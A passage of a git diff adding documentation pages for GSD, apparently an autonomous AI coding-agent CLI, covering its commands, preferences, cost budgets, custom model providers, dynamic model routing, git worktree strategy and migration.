+  </Step>
+</Steps>
+
+## Classification types
+
+| Type | Meaning | Resolution |
+|------|---------|------------|
+| `quick-task` | Small, self-contained fix | Inline quick task executed immediately |
+| `inject` | New task needed in current slice | Task injected into the active slice plan |
+| `defer` | Important but not urgent | Deferred to roadmap reassessment |
+| `replan` | Changes the current approach | Triggers slice replan with capture context |
+| `note` | Informational, no action | Acknowledged, no plan changes |
+
+## Manual triage
+
+Trigger triage at any time:
+
+```
+/gsd triage
+```
+
+Useful when you've accumulated several captures and want to process them before the next natural seam.
+
+## Dashboard integration
+
+The progress widget shows a pending capture count badge when captures are waiting for triage. Visible in both the `Ctrl+Alt+G` dashboard and the auto-mode widget.
+
+## Context injection
+
+Capture context is automatically injected into:
+- **Replan-slice prompts** — so the replan knows what triggered it
+- **Reassess-roadmap prompts** — so deferred captures influence roadmap decisions
+
+## Worktree awareness
+
+Captures resolve to the **original project root's** `.gsd/CAPTURES.md`, not the worktree's local copy. Captures from a steering terminal are visible to the auto-mode session running in a worktree.
diff --git a/mintlify-docs/guides/commands.mdx b/mintlify-docs/guides/commands.mdx
new file mode 100644
index 000000000..8c9c9bba0
--- /dev/null
+++ b/mintlify-docs/guides/commands.mdx
@@ -0,0 +1,182 @@
+---
+title: "Commands reference"
+description: "Every GSD command, keyboard shortcut, and CLI flag."
+---
+
+## Session commands
+
+| Command | Description |
+|---------|-------------|
+| `/gsd` | Step mode — execute one unit at a time, pause between each |
+| `/gsd next` | Explicit step mode (same as `/gsd`) |
+| `/gsd auto` | Autonomous mode — research, plan, execute, commit, repeat |
+| `/gsd quick` | Execute a quick task with GSD guarantees without full planning overhead |
+| `/gsd stop` | Stop auto mode gracefully |
+| `/gsd pause` | Pause auto mode (preserves state, `/gsd auto` to resume) |
+| `/gsd steer` | Hard-steer plan documents during execution |
+| `/gsd discuss` | Discuss architecture and decisions (works alongside auto mode) |
+| `/gsd rethink` | Conversational project reorganization |
+| `/gsd mcp` | MCP server status and connectivity |
+| `/gsd status` | Progress dashboard |
+| `/gsd widget` | Cycle dashboard widget: full / small / min / off |
+| `/gsd queue` | Queue and reorder future milestones (safe during auto mode) |
+| `/gsd capture` | Fire-and-forget thought capture (works during auto mode) |
+| `/gsd triage` | Manually trigger triage of pending captures |
+| `/gsd dispatch` | Dispatch a specific phase directly |
+| `/gsd history` | View execution history (supports `--cost`, `--phase`, `--model` filters) |
+| `/gsd forensics` | Full-access debugger for auto-mode failures |
+| `/gsd cleanup` | Clean up GSD state files and stale worktrees |
+| `/gsd visualize` | Open workflow visualizer |
+| `/gsd export --html` | Generate self-contained HTML report |
+| `/gsd export --html --all` | Generate reports for all milestones |
+| `/gsd update` | Update GSD to the latest version in-session |
+| `/gsd knowledge` | Add persistent project knowledge |
+| `/gsd fast` | Toggle service tier for supported models |
+| `/gsd rate` | Rate last unit's model tier (over/ok/under) |
+| `/gsd changelog` | Show categorized release notes |
+| `/gsd logs` | Browse activity logs, debug logs, and metrics |
+| `/gsd remote` | Control remote auto-mode |
+| `/gsd help` | Categorized command reference |
+
+## Configuration and diagnostics
+
+| Command | Description |
+|---------|-------------|
+| `/gsd prefs` | Model selection, timeouts, budget ceiling |
+| `/gsd mode` | Switch workflow mode (solo/team) |
+| `/gsd config` | Re-run the provider setup wizard |
+| `/gsd keys` | API key manager — list, add, remove, test, rotate |
+| `/gsd doctor` | Runtime health checks with auto-fix |
+| `/gsd inspect` | Show SQLite DB diagnostics |
+| `/gsd init` | Project init wizard |
+| `/gsd setup` | Global setup status and configuration |
+| `/gsd skill-health` | Skill lifecycle dashboard |
+| `/gsd hooks` | Show configured post-unit and pre-dispatch hooks |
+| `/gsd run-hook` | Manually trigger a specific hook |
+| `/gsd migrate` | Migrate a v1 `.planning` directory to `.gsd` format |
+
+## Milestone management
+
+| Command | Description |
+|---------|-------------|
+| `/gsd new-milestone` | Create a new milestone |
+| `/gsd skip` | Prevent a unit from auto-mode dispatch |
+| `/gsd undo` | Revert last completed unit |
+| `/gsd undo-task` | Reset a specific task's completion state |
+| `/gsd reset-slice` | Reset a slice and all its tasks |
+| `/gsd park` | Park a milestone — skip without deleting |
+| `/gsd unpark` | Reactivate a parked milestone |
+
+## Parallel orchestration
+
+| Command | Description |
+|---------|-------------|
+| `/gsd parallel start` | Analyze eligibility, confirm, and start workers |
+| `/gsd parallel status` | Show all workers with state, progress, and cost |
+| `/gsd parallel stop [MID]` | Stop all workers or a specific one |
+| `/gsd parallel pause [MID]` | Pause all or a specific worker |
+| `/gsd parallel resume [MID]` | Resume paused workers |
+| `/gsd parallel merge [MID]` | Merge completed milestones to main |
+
+## Workflow templates
+
+| Command | Description |
+|---------|-------------|
+| `/gsd start` | Start a workflow template (bugfix, spike, feature, hotfix, refactor, etc.) |
+| `/gsd start resume` | Resume an in-progress workflow |
+| `/gsd templates` | List available workflow templates |
+| `/gsd templates info <name>` | Show detailed template info |
+
+## Custom workflows
+
+| Command | Description |
+|---------|-------------|
+| `/gsd workflow new` | Create a new workflow definition |
+| `/gsd workflow run <name>` | Create a run and start auto-mode |
+| `/gsd workflow list` | List workflow runs |
+| `/gsd workflow validate <name>` | Validate a workflow definition |
+| `/gsd workflow pause` | Pause custom workflow auto-mode |
+| `/gsd workflow resume` | Resume paused custom workflow auto-mode |
+
+## Extensions
+
+| Command | Description |
+|---------|-------------|
+| `/gsd extensions list` | List all extensions and their status |
+| `/gsd extensions enable <id>` | Enable a disabled extension |
+| `/gsd extensions disable <id>` | Disable an extension |
+| `/gsd extensions info <id>` | Show extension details |
+
+## Keyboard shortcuts
+
+| Shortcut | Action |
+|----------|--------|
+| `Ctrl+Alt+G` | Toggle dashboard overlay |
+| `Ctrl+Alt+V` | Toggle voice transcription |
+| `Ctrl+Alt+B` | Show background shell processes |
+| `Ctrl+V` / `Alt+V` | Paste image from clipboard |
+| `Escape` | Pause auto mode |
+
+<Note>
+In terminals without Kitty keyboard protocol support (macOS Terminal.app, JetBrains IDEs), slash-command fallbacks are shown instead of `Ctrl+Alt` shortcuts.
+</Note>
+
+## CLI flags
+
+| Flag | Description |
+|------|-------------|
+| `gsd` | Start a new interactive session |
+| `gsd --continue` (`-c`) | Resume the most recent session |
+| `gsd --model <id>` | Override the default model |
+| `gsd --print "msg"` (`-p`) | Single-shot prompt mode (no TUI) |
+| `gsd --mode <text\|json\|rpc\|mcp>` | Output mode for non-interactive use |
+| `gsd --list-models [search]` | List available models and exit |
+| `gsd --web [path]` | Start browser-based web interface |
+| `gsd --worktree` (`-w`) `[name]` | Start session in a git worktree |
+| `gsd --no-session` | Disable session persistence |
+| `gsd --extension <path>` | Load an additional extension |
+| `gsd --version` (`-v`) | Print version and exit |
+| `gsd sessions` | Interactive session picker |
+| `gsd config` | Set up global API keys |
+| `gsd update` | Update GSD to the latest version |
+
+## Headless mode
+
+`gsd headless` runs commands without a TUI — designed for CI, cron jobs, and scripted automation.
+
+```bash
+gsd headless              # run auto mode
+gsd headless next         # run a single unit
+gsd headless query        # instant JSON snapshot (~50ms, no LLM)
+gsd headless --timeout 600000 auto   # with timeout
+gsd headless new-milestone --context brief.md --auto
+```
+
+| Flag | Description |
+|------|-------------|
+| `--timeout N` | Overall timeout in milliseconds (default: 300000) |
+| `--max-restarts N` | Auto-restart on crash (default: 3, set 0 to disable) |
+| `--json` | Stream events as JSONL to stdout |
+| `--model ID` | Override the model |
+| `--context <file>` | Context file for `new-milestone` (use `-` for stdin) |
+| `--auto` | Chain into auto-mode after milestone creation |
+
+**Exit codes:** `0` = complete, `1` = error/timeout, `2` = blocked.
+
+### `gsd headless query`
+
+Returns a JSON snapshot of the project state — no LLM session, instant response.
+
+```bash
+gsd headless query | jq '.state.phase'      # "executing"
+gsd headless query | jq '.next'              # next dispatch action
+gsd headless query | jq '.cost.total'        # total spend
+```
+
+## MCP server mode
+
+```bash
+gsd --mode mcp
+```
+
+Runs GSD as a Model Context Protocol server over stdin/stdout, exposing all tools to external AI clients (Claude Desktop, VS Code Copilot, etc.).
diff --git a/mintlify-docs/guides/configuration.mdx b/mintlify-docs/guides/configuration.mdx
new file mode 100644
index 000000000..4961d66b9
--- /dev/null
+++ b/mintlify-docs/guides/configuration.mdx
@@ -0,0 +1,306 @@
+---
+title: "Configuration"
+description: "Preferences, model selection, MCP servers, hooks, and all settings."
+---
+
+GSD preferences live in `~/.gsd/PREFERENCES.md` (global) or `.gsd/PREFERENCES.md` (project-local). Manage interactively with `/gsd prefs`.
+
+## Preferences commands
+
+| Command | Description |
+|---------|-------------|
+| `/gsd prefs` | Open the global preferences wizard |
+| `/gsd prefs global` | Global preferences wizard |
+| `/gsd prefs project` | Project preferences wizard |
+| `/gsd prefs status` | Show current files, merged values, and skill status |
+
+## Preferences file format
+
+Preferences use YAML frontmatter in a markdown file:
+
+```yaml
+---
+version: 1
+models:
+  research: claude-sonnet-4-6
+  planning: claude-opus-4-6
+  execution: claude-sonnet-4-6
+  completion: claude-sonnet-4-6
+skill_discovery: suggest
+auto_supervisor:
+  soft_timeout_minutes: 20
+  idle_timeout_minutes: 10
+  hard_timeout_minutes: 30
+budget_ceiling: 50.00
+token_profile: balanced
+---
+```
+
+## Global vs project preferences
+
+| Scope | Path | Applies to |
+|-------|------|-----------|
+| Global | `~/.gsd/PREFERENCES.md` | All projects |
+| Project | `.gsd/PREFERENCES.md` | Current project only |
+
+**Merge behavior:**
+- **Scalar fields** — project wins if defined
+- **Array fields** — concatenated (global first, then project)
+- **Object fields** — shallow-merged, project overrides per-key
+
+## Global API keys
+
+Tool API keys are stored globally in `~/.gsd/agent/auth.json`. Set them once with `/gsd config`.
+
+| Tool | Environment variable | Purpose |
+|------|---------------------|---------|
+| Tavily Search | `TAVILY_API_KEY` | Web search for non-Anthropic models |
+| Brave Search | `BRAVE_API_KEY` | Web search for non-Anthropic models |
+| Context7 Docs | `CONTEXT7_API_KEY` | Library documentation lookup |
+
+Anthropic models have built-in web search — no extra keys needed.
+
+## MCP servers
+
+GSD connects to external MCP servers configured in project files:
+
+- `.mcp.json` — repo-shared config
+- `.gsd/mcp.json` — local-only config
+
+<Tabs>
+  <Tab title="stdio server">
+    ```json
+    {
+      "mcpServers": {
+        "my-server": {
+          "type": "stdio",
+          "command": "/absolute/path/to/python3",
+          "args": ["/absolute/path/to/server.py"],
+          "env": {
+            "API_URL": "http://localhost:8000"
+          }
+        }
+      }
+    }
+    ```
+  </Tab>
+  <Tab title="HTTP server">
+    ```json
+    {
+      "mcpServers": {
+        "my-http-server": {
+          "url": "http://localhost:8080/mcp"
+        }
+      }
+    }
+    ```
+  </Tab>
+</Tabs>
+
+Verify from a GSD session: `mcp_servers` → `mcp_discover` → `mcp_call`.
+
+## Models
+
+Per-phase model selection:
+
+```yaml
+models:
+  research: claude-sonnet-4-6
+  planning:
+    model: claude-opus-4-6
+    fallbacks:
+      - openrouter/z-ai/glm-5
+  execution: claude-sonnet-4-6
+  execution_simple: claude-haiku-4-5-20250414
+  completion: claude-sonnet-4-6
+  subagent: claude-sonnet-4-6
+```
+
+**Phases:** `research`, `planning`, `execution`, `execution_simple`, `completion`, `subagent`
+
+When a model fails to switch, GSD automatically tries the next model in the `fallbacks` list.
+
+For custom providers (Ollama, vLLM, LM Studio), see [custom models](/guides/custom-models).
+
+## All settings
+
+### `token_profile`
+
+Coordinates model selection, phase skipping, and context compression. Values: `budget`, `balanced` (default), `quality`. See [token optimization](/guides/token-optimization).
+
+### `budget_ceiling`
+
+Maximum USD spend during auto mode:
+
+```yaml
+budget_ceiling: 50.00
+budget_enforcement: pause    # warn, pause (default), or halt
+```
+
+### `auto_supervisor`
+
+Timeout thresholds:
+
+```yaml
+auto_supervisor:
+  soft_timeout_minutes: 20
+  idle_timeout_minutes: 10
+  hard_timeout_minutes: 30
+```
+
+### `skill_discovery`
+
+| Value | Behavior |
+|-------|----------|
+| `auto` | Skills found and applied automatically |
+| `suggest` | Skills identified but not auto-installed (default) |
+| `off` | Disabled |
+
+### Verification
+
+```yaml
+verification_commands:
+  - npm run lint
+  - npm run test
+verification_auto_fix: true
+verification_max_retries: 2
+```
+
+### Git
+
+See [git strategy](/guides/git-strategy) for full git configuration.
+
+### Notifications
+
+```yaml
+notifications:
+  enabled: true
+  on_complete: true
+  on_error: true
+  on_budget: true
+  on_milestone: true
+  on_attention: true
+```
+
+### Post-unit hooks
+
+```yaml
+post_unit_hooks:
+  - name: code-review
+    after: [execute-task]
+    prompt: "Review the code changes for quality and security."
+    model: claude-opus-4-6
+    max_cycles: 1
+    artifact: REVIEW.md
+```
+
+### Pre-dispatch hooks
+
+```yaml
+pre_dispatch_hooks:
+  - name: add-standards
+    before: [execute-task]
+    action: modify          # modify, skip, or replace
+    prepend: "Follow our coding standards."
+```
+
+### Skill routing
+
+```yaml
+always_use_skills:
+  - debug-like-expert
+prefer_skills:
+  - frontend-design
+skill_rules:
+  - when: task involves authentication
+    use: [clerk]
+```
+
+### Custom instructions
+
+```yaml
+custom_instructions:
+  - "Always use TypeScript strict mode"
+  - "Prefer functional patterns over classes"
+```
+
+### Dynamic routing
+
+See [dynamic model routing](/guides/dynamic-model-routing).
+
+### Parallel execution
+
+See [parallel orchestration](/guides/parallel-orchestration).
+
+## Environment variables
+
+| Variable | Default | Description |
+|----------|---------|-------------|
+| `GSD_HOME` | `~/.gsd` | Global GSD directory |
+| `GSD_PROJECT_ID` | (auto-hash) | Override project identity hash |
+| `GSD_STATE_DIR` | `$GSD_HOME` | Per-project state root |
+| `GSD_CODING_AGENT_DIR` | `$GSD_HOME/agent` | Agent directory |
+
+## Full example
+
+<Accordion title="Complete preferences file">
+```yaml
+---
+version: 1
+
+models:
+  research: openrouter/deepseek/deepseek-r1
+  planning:
+    model: claude-opus-4-6
+    fallbacks:
+      - openrouter/z-ai/glm-5
+  execution: claude-sonnet-4-6
+  execution_simple: claude-haiku-4-5-20250414
+  completion: claude-sonnet-4-6
+
+token_profile: balanced
+
+dynamic_routing:
+  enabled: true
+  escalate_on_failure: true
+  budget_pressure: true
+
+budget_ceiling: 25.00
+budget_enforcement: pause
+context_pause_threshold: 80
+
+auto_supervisor:
+  soft_timeout_minutes: 15
+  hard_timeout_minutes: 25
+
+git:
+  auto_push: true
+  merge_strategy: squash
+  isolation: none
+  commit_docs: true
+
+skill_discovery: suggest
+always_use_skills:
+  - debug-like-expert
+skill_rules:
+  - when: task involves authentication
+    use: [clerk]
+
+notifications:
+  on_complete: false
+  on_milestone: true
+  on_attention: true
+
+auto_visualize: true
+service_tier: priority
+forensics_dedup: true
+show_token_cost: true
+
+post_unit_hooks:
+  - name: code-review
+    after: [execute-task]
+    prompt: "Review {sliceId}/{taskId} for quality and security."
+    artifact: REVIEW.md
+---
+```
+</Accordion>
diff --git a/mintlify-docs/guides/cost-management.mdx b/mintlify-docs/guides/cost-management.mdx
new file mode 100644
index 000000000..52e25e6c8
--- /dev/null
+++ b/mintlify-docs/guides/cost-management.mdx
@@ -0,0 +1,80 @@
+---
+title: "Cost management"
+description: "Budget ceilings, cost tracking, projections, and enforcement modes."
+---
+
+GSD tracks token usage and cost for every unit of work dispatched during auto mode. This data powers the dashboard, budget enforcement, and cost projections.
+
+## Cost tracking
+
+Every unit's metrics are captured automatically:
+
+- **Token counts** — input, output, cache read, cache write, total
+- **Cost** — USD cost per unit
+- **Duration** — wall-clock time
+- **Tool calls** — number of tool invocations
+- **Message counts** — assistant and user messages
+
+Data is stored in `.gsd/metrics.json` and survives across sessions.
+
+### Viewing costs
+
+`Ctrl+Alt+G` or `/gsd status` shows real-time cost breakdown by:
+
+- Phase (research, planning, execution, completion, reassessment)
+- Slice (M001/S01, M001/S02, ...)
+- Model (which models consumed the most budget)
+- Project totals
+
+## Budget ceiling
+
+```yaml
+budget_ceiling: 50.00
+```
+
+### Enforcement modes
+
+| Mode | Behavior |
+|------|----------|
+| `warn` | Log a warning, continue |
+| `pause` | Pause auto mode (default when ceiling is set) |
+| `halt` | Stop auto mode entirely |
+
+## Cost projections
+
+After two or more slices complete, GSD projects the remaining cost:
+
+```
+Projected remaining: $12.40 ($6.20/slice avg × 2 remaining)
+```
+
+## Budget pressure and model downgrading
+
+When approaching the budget ceiling, the [complexity router](/guides/token-optimization) automatically downgrades model assignments:
+
+| Budget used | Effect |
+|------------|--------|
+| < 50% | No adjustment |
+| 50-75% | Standard tasks → Light |
+| 75-90% | More aggressive |
+| > 90% | Nearly everything downgrades |
+
+## Token profiles and cost
+
+| Profile | Typical savings | How |
+|---------|----------------|-----|
+| `budget` | 40-60% | Cheaper models, phase skipping, minimal context |
+| `balanced` | 10-20% | Default models, skip slice research |
+| `quality` | 0% (baseline) | Full models, all phases |
+
+See [token optimization](/guides/token-optimization) for details.
+
+## Tips
+
+- Start with `balanced` and a generous `budget_ceiling` to establish baseline costs
+- Check `/gsd status` after a few slices to see per-slice averages
+- Switch to `budget` for well-understood, repetitive work
+- Use `quality` only for architectural decisions
+- Per-phase model selection lets you use Opus for planning while keeping execution on Sonnet
+- Enable [dynamic routing](/guides/dynamic-model-routing) for automatic downgrading on simple tasks
+- Use `/gsd visualize` → Metrics tab to see where your budget is going
diff --git a/mintlify-docs/guides/custom-models.mdx b/mintlify-docs/guides/custom-models.mdx
new file mode 100644
index 000000000..02e61ae7d
--- /dev/null
+++ b/mintlify-docs/guides/custom-models.mdx
@@ -0,0 +1,126 @@
+---
+title: "Custom models"
+description: "Add custom providers and models (Ollama, vLLM, LM Studio, proxies) via models.json."
+---
+
+Define custom models and providers in `~/.gsd/agent/models.json`. This lets you add models not in the default registry — self-hosted endpoints, fine-tuned models, proxies, or new provider releases.
+
+The file reloads each time you open `/model` — no restart needed.
+
+## Minimal example
+
+For local models (Ollama, LM Studio, vLLM):
+
+```json
+{
+  "providers": {
+    "ollama": {
+      "baseUrl": "http://localhost:11434/v1",
+      "api": "openai-completions",
+      "apiKey": "ollama",
+      "models": [
+        { "id": "llama3.1:8b" },
+        { "id": "qwen2.5-coder:7b" }
+      ]
+    }
+  }
+}
+```
+
+The `apiKey` is required but Ollama ignores it — any value works.
+
+## Supported APIs
+
+| API | Description |
+|-----|-------------|
+| `openai-completions` | OpenAI Chat Completions (most compatible) |
+| `openai-responses` | OpenAI Responses API |
+| `anthropic-messages` | Anthropic Messages API |
+| `google-generative-ai` | Google Generative AI |
+
+## Provider configuration
+
+| Field | Description |
+|-------|-------------|
+| `baseUrl` | API endpoint URL |
+| `api` | API type |
+| `apiKey` | API key (supports shell commands, env vars, or literals) |
+| `headers` | Custom headers |
+| `authHeader` | Set `true` to add `Authorization: Bearer` automatically |
+| `models` | Array of model configurations |
+| `modelOverrides` | Per-model overrides for built-in models |
+
+### Value resolution
+
+The `apiKey` and `headers` fields support three formats:
+
+```json
+"apiKey": "!security find-generic-password -ws 'anthropic'"  // shell command
+"apiKey": "MY_API_KEY"                                        // env variable
+"apiKey": "sk-..."                                            // literal value
+```
+
+## Model configuration
+
+| Field | Required | Default | Description |
+|-------|----------|---------|-------------|
+| `id` | Yes | — | Model identifier (passed to the API) |
+| `name` | No | `id` | Human-readable label |
+| `api` | No | provider's `api` | Override per model |
+| `reasoning` | No | `false` | Supports extended thinking |
+| `input` | No | `["text"]` | `["text"]` or `["text", "image"]` |
+| `contextWindow` | No | `128000` | Context window size |
+| `maxTokens` | No | `16384` | Maximum output tokens |
+| `cost` | No | all zeros | Per-million tokens: `input`, `output`, `cacheRead`, `cacheWrite` |
+
+## Overriding built-in providers
+
+Route a built-in provider through a proxy without redefining models:
+
+```json
+{
+  "providers": {
+    "anthropic": {
+      "baseUrl": "https://my-proxy.example.com/v1"
+    }
+  }
+}
+```
+
+All built-in Anthropic models remain available. To add custom models alongside built-in ones, include the `models` array.
+
+## OpenAI compatibility
+
+For providers with partial OpenAI compatibility, use the `compat` field at provider or model level:
+
+```json
+{
+  "providers": {
+    "local-llm": {
+      "baseUrl": "http://localhost:8080/v1",
+      "api": "openai-completions",
+      "compat": {
+        "supportsDeveloperRole": false,
+        "supportsReasoningEffort": false
+      },
+      "models": [...]
+    }
+  }
+}
+```
+
+| Field | Description |
+|-------|-------------|
+| `supportsDeveloperRole` | Use `developer` vs `system` role |
+| `supportsReasoningEffort` | Support for `reasoning_effort` parameter |
+| `supportsUsageInStreaming` | Support for `stream_options: { include_usage: true }` |
+| `maxTokensField` | `max_completion_tokens` or `max_tokens` |
+| `thinkingFormat` | `reasoning_effort`, `zai`, `qwen`, or `qwen-chat-template` |
+| `openRouterRouting` | OpenRouter provider selection config |
+| `vercelGatewayRouting` | Vercel AI Gateway provider selection |
+
+## Community provider extensions
+
+| Extension | Provider | Models | Install |
+|-----------|----------|--------|---------|
+| [`pi-dashscope`](https://www.npmjs.com/package/pi-dashscope) | Alibaba DashScope | Qwen3, GLM-5, MiniMax M2.5, Kimi K2.5 | `gsd install npm:pi-dashscope` |
diff --git a/mintlify-docs/guides/dynamic-model-routing.mdx b/mintlify-docs/guides/dynamic-model-routing.mdx
new file mode 100644
index 000000000..d6cb80ed6
--- /dev/null
+++ b/mintlify-docs/guides/dynamic-model-routing.mdx
@@ -0,0 +1,94 @@
+---
+title: "Dynamic model routing"
+description: "Automatically select cheaper models for simple work and reserve expensive models for complex tasks."
+---
+
+Dynamic model routing classifies each dispatched unit into a complexity tier and selects an appropriate model. This reduces token consumption by 20-50% without sacrificing quality where it matters.
+
+The key rule: **downgrade-only semantics**. Your configured model is always the ceiling — routing never upgrades beyond what you've configured.
+
+## Enabling
+
+```yaml
+dynamic_routing:
+  enabled: true
+```
+
+## Complexity tiers
+
+| Tier | Typical work | Default model level |
+|------|-------------|-------------------|
+| **Light** | Slice completion, UAT, hooks | Haiku-class |
+| **Standard** | Research, planning, execution | Sonnet-class |
+| **Heavy** | Replanning, roadmap reassessment | Opus-class |
+
+## Configuration
+
+```yaml
+dynamic_routing:
+  enabled: true
+  tier_models:
+    light: claude-haiku-4-5
+    standard: claude-sonnet-4-6
+    heavy: claude-opus-4-6
+  escalate_on_failure: true    # bump tier on task failure
+  budget_pressure: true        # auto-downgrade near budget ceiling
+  cross_provider: true         # consider models from other providers
+```
+
+### `escalate_on_failure`
+
+When a task fails at a given tier, the router escalates: Light → Standard → Heavy. Prevents cheap models from burning retries on work that needs more reasoning.
+
+### `budget_pressure`
+
+Progressive downgrading as budget ceiling approaches:
+
+| Budget used | Effect |
+|------------|--------|
+| < 50% | No adjustment |
+| 50-75% | Standard → Light |
+| 75-90% | More aggressive |
+| > 90% | Nearly everything → Light |
+
+### `cross_provider`
+
+The router may select models from providers other than your primary, using a built-in cost table to find the cheapest model at each tier.
+
+## Task plan analysis
+
+For `execute-task` units, the classifier analyzes the task plan:
+
+| Signal | Simple → Light | Complex → Heavy |
+|--------|---------------|----------------|
+| Step count | ≤ 3 | ≥ 8 |
+| File count | ≤ 3 | ≥ 8 |
+| Description length | < 500 chars | > 2000 chars |
+| Code blocks | — | ≥ 5 |
+| Complexity keywords | None | Present |
+
+## Adaptive learning
+
+The routing history (`.gsd/routing-history.json`) tracks success/failure per tier per unit type. If a tier's failure rate exceeds 20%, future classifications are bumped up.
+
+User feedback (`/gsd rate`) is weighted 2x vs automatic outcomes.
+
+## Cost table
+
+| Model | Input (per M) | Output (per M) |
+|-------|-------|--------|
+| claude-haiku-4-5 | $0.80 | $4.00 |
+| claude-sonnet-4-6 | $3.00 | $15.00 |
+| claude-opus-4-6 | $15.00 | $75.00 |
+| gpt-4o-mini | $0.15 | $0.60 |
+| gpt-4o | $2.50 | $10.00 |
+| gemini-2.0-flash | $0.10 | $0.40 |
+
+The cost table is for comparison only — actual billing comes from your provider.
+
+## Interaction with token profiles
+
+- **Token profiles** control phase skipping and context compression
+- **Dynamic routing** controls per-unit model selection within those constraints
+
+The `budget` profile + dynamic routing provides maximum cost savings.
diff --git a/mintlify-docs/guides/git-strategy.mdx b/mintlify-docs/guides/git-strategy.mdx
new file mode 100644
index 000000000..67ce24742
--- /dev/null
+++ b/mintlify-docs/guides/git-strategy.mdx
@@ -0,0 +1,157 @@
+---
+title: "Git strategy"
+description: "Isolation modes, branching model, and merge behavior for milestone work."
+---
+
+GSD uses git for milestone isolation and sequential commits. You choose an **isolation mode** that controls where work happens. The strategy is fully automated — no manual branch management needed.
+
+## Isolation modes
+
+Configure via the `git.isolation` preference:
+
+| Mode | Working directory | Branch | Best for |
+|------|-------------------|--------|----------|
+| `none` (default) | Project root | Current branch | Most projects — no isolation overhead |
+| `worktree` | `.gsd/worktrees/<MID>/` | `milestone/<MID>` | Full file isolation |
+| `branch` | Project root | `milestone/<MID>` | Submodule-heavy repos |
+
+### `none` mode (default)
+
+Work happens directly on your current branch. No worktree, no milestone branch. GSD still commits sequentially with conventional commit messages, but there's no branch isolation. This is the simplest mode and works well for most projects.
+
+### `worktree` mode
+
+Each milestone gets its own git worktree on a `milestone/<MID>` branch. All execution happens inside the worktree. On completion, the worktree is squash-merged to main as one clean commit. The worktree and branch are cleaned up.
+
+### `branch` mode
+
+Work happens in the project root on a `milestone/<MID>` branch. No worktree is created. On completion, the branch is merged to main.
+
+<Note>
+**Changed in v2.45.0:** The default isolation mode changed from `worktree` to `none`. If your workflow relies on worktree isolation, set `git.isolation: worktree` explicitly in your preferences.
+</Note>
+
+## Branching model
+
+```
+main ─────────────────────────────────────────────────────────
+  │                                                     ↑
+  └── milestone/M001 (worktree) ────────────────────────┘
+       commit: feat: core types
+       commit: feat: markdown parser
+       commit: feat: file writer
+       → squash-merged to main as single commit
+```
+
+### Parallel worktrees
+
+With [parallel orchestration](/guides/parallel-orchestration) enabled, multiple milestones run in separate worktrees simultaneously:
+
+```
+main ──────────────────────────────────────────────────────────
+  │                                      ↑              ↑
+  ├── milestone/M002 (worktree) ─────────┘              │
+  │    → squash-merged first                            │
+  │                                                     │
+  └── milestone/M003 (worktree) ────────────────────────┘
+       → squash-merged second
+```
+
+Merges happen sequentially to avoid conflicts.
+
+### Commit format
+
+Conventional commit format with GSD metadata in trailers:
+
+```
+feat: core type definitions
+
+GSD-Task: M001/S01/T01
+
+feat: markdown parser for plan files
+
+GSD-Task: M001/S01/T02
+```
+
+## Workflow modes
+
+Set `mode` to get sensible defaults:
+
+```yaml
+mode: solo    # personal projects
+mode: team    # shared repos
+```
+
+| Setting | `solo` | `team` |
+|---|---|---|
+| `git.auto_push` | `true` | `false` |
+| `git.push_branches` | `false` | `true` |
+| `git.pre_merge_check` | `false` | `true` |
+| `git.merge_strategy` | `"squash"` | `"squash"` |
+| `unique_milestone_ids` | `false` | `true` |
+
+Mode defaults are the lowest priority — any explicit preference overrides them.
+
+## Git preferences
+
+```yaml
+git:
+  auto_push: false
+  push_branches: false
+  remote: origin
+  snapshots: false
+  pre_merge_check: false
+  commit_type: feat
+  main_branch: main
+  merge_strategy: squash    # "squash" or "merge"
+  isolation: none           # "none" (default), "worktree", or "branch"
+  commit_docs: true
+  auto_pr: false
+  pr_target_branch: develop
+```
+
+### Automatic pull requests
+
+For teams using Gitflow or branch-based workflows:
+
+```yaml
+git:
+  auto_push: true
+  auto_pr: true
+  pr_target_branch: develop
+```
+
+Pushes the milestone branch and creates a PR targeting your specified branch. Requires `gh` CLI installed and authenticated.
+
+### `commit_docs: false`
+
+Adds `.gsd/` to `.gitignore` and keeps all planning artifacts local-only. Useful for teams where only some members use GSD.
+
+## Worktree management
+
+### Automatic (auto mode)
+
+1. Milestone starts → worktree created at `.gsd/worktrees/<MID>/`
+2. Planning artifacts copied into the worktree
+3. All execution happens inside the worktree
+4. Milestone completes → squash-merged to main
+5. Worktree and branch cleaned up
+
+### Manual
+
+```
+/worktree create
+/worktree switch
+/worktree merge
+/worktree remove
+```
+
+## Self-healing
+
+GSD includes automatic recovery for common git issues:
+
+- **Detached HEAD** — automatically reattaches to the correct branch
+- **Stale lock files** — removes `index.lock` files from crashed processes
+- **Orphaned worktrees** — detects and offers cleanup
+
+Run `/gsd doctor` to check git health manually.
diff --git a/mintlify-docs/guides/migration.mdx b/mintlify-docs/guides/migration.mdx
new file mode 100644
index 000000000..8f4646d79
--- /dev/null
+++ b/mintlify-docs/guides/migration.mdx
@@ -0,0 +1,47 @@
+---
+title: "Migration from v1"
+description: "Migrate .planning directories from the original GSD to GSD-2's .gsd format."
+---
+
+If you have projects with `.planning` directories from the original Get Shit Done (v1), you can migrate them to GSD-2's `.gsd` format.
+
+## Running the migration
+
+```bash
+# From within the project directory
+/gsd migrate
+
+# Or specify a path
+/gsd migrate ~/projects/my-old-project
+```
+
+## What gets migrated
+
+The migration tool:
+
+- Parses `PROJECT.md`, `ROADMAP.md`, `REQUIREMENTS.md`, phase directories, plans, summaries, and research
+- Maps phases → slices, plans → tasks, milestones → milestones
+- Preserves completion state (`[x]` phases stay done, summaries carry over)
+- Consolidates research files
+- Shows a preview before writing anything
+- Optionally runs an agent-driven review of the output
+
+## Supported formats
+
+The migration handles various v1 format variations:
+
+- Milestone-sectioned roadmaps with `<details>` blocks
+- Bold phase entries
+- Bullet-format requirements
+- Decimal phase numbering
+- Duplicate phase numbers across milestones
+
+## Post-migration
+
+Verify the output:
+
+```
+/gsd doctor
+```
+
+This checks `.gsd/` integrity and flags any structural issues.
diff --git a/mintlify-docs/guides/parallel-orchestration.mdx b/mintlify-docs/guides/parallel-orchestration.mdx
new file mode 100644
index 000000000..830f0d10e
--- /dev/null
+++ b/mintlify-docs/guides/parallel-orchestration.mdx
@@ -0,0 +1,123 @@
+---
+title: "Parallel orchestration"
+description: "Run multiple milestones simultaneously in isolated git worktrees."
+---
+
+Run multiple milestones simultaneously. Each gets its own worker process, branch, and context window — while a coordinator tracks progress, enforces budgets, and keeps everything in sync.
+
+<Note>
+Parallel mode is behind `parallel.enabled: false` by default. Opt-in only.
+</Note>
+
+## Quick start
+
